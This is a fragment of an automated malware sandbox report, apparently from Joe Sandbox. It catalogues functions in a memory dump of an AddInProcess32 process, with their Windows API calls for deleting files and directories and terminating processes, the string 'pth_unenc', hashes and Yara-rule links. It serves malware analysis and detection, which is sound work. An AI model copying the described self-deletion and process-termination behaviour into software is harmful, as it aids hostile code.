                                                                                                        • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                        • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                        • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                        Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteDirectoryFileRemove
                                                                                                        • String ID: pth_unenc
                                                                                                        • API String ID: 3325800564-4028850238
                                                                                                        • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                        • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                        • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                        • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                        Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ObjectProcessSingleTerminateWait
                                                                                                        • String ID: pth_unenc
                                                                                                        • API String ID: 1872346434-4028850238
                                                                                                        • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                        • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                        • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                        • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                        Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                        • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1717984340-0
                                                                                                        • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                        • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                        • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                        • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759